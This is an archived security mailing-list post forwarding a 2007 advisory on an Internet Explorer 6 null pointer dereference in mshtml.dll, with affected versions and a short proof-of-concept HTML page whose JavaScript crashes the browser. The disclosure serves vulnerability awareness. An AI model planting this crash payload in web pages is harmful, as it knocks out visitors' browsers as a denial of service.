ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [EXPL] MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Wednesday, February 07, 2007 12:07 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] MS Internet Explorer 6 Null Pointer 
> Dereference Exploit (mshtml.dll)
> 
> - - - - - - - - -
> 
> 
> 
> MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll) 
> 
> 
> 
> Microsoft Internet Explorer version 6 crashes when you open 
> the attached HTML page, this is due to its attempt to 
> dereference a NULL pointer. 
> 
> 
> Vulnerable Systems: 
>  * Microsoft Internet Explorer version 6.0.2800.1106; SP1 
> (Windows 2000 Advanced Server) 
>  * Microsoft Internet Explorer version 
> 6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) 
> 
> Exploit: 
> <!-- 
> + Title: Microsoft Internet Explorer Malformed HTML Null 
> Pointer Dereference Vulnerability (mshtml.dll) (0-day) 
> 
> + Bug discovered & exploit coded by AmesianX in 
> powerhacker.net (YoungHo Park - amesianx@xxxxxxxxx) 
> 
> + Critical: Critical 
> 
> + Impact: MS Internet Explorer 6 -> Crash (Denial of Service) 
> 
> + Where: From remote 
> 
> + Tested Operating System: Windows XP SP2 FULL PATCHED 
> (Korean Language) 
>                                           Windows 2000 
> Advanced Server (Korean Language) 
> 
> + Tested Software: Microsoft Internet Explorer 
> Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server) 
>                             Microsoft Internet Explorer 
> Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) 
> 
> + Solution: Not Patched (zero-day) 
> 
> + Description: 
>   The following bug was tested on the latest version of 
> Internet Explorer 6 on a fully-patched 
>   Windows XP SP2 system. this bug will crash when executing a 
> 'for' scripts. 
> 
> + The following proof-of-concept is also available: 
>   http://www.powerhacker.net/exploit/IE_NULL_CRASH.html 
> --> 
> 
> <html> 
>  <head> 
>   <title> AmesianX, RC_No1 in powerhacker.net 
> (amesianx@xxxxxxxxx, RC_No1@xxxxxxxxx)</title> 
>  </head> 
>  <body> 
>   <script language='javascript'> 
>    var data = document['getElementById']; 
>    for(var key in data); 
>   </script> 
>  </body> 
> </html> 
> 
> 
> Additional Information: 
> The original article can be found at: 
> http://www.milw0rm.com/exploits/3272 
> 
> 
> 



 




Copyright © Lexa Software, 1996-2009.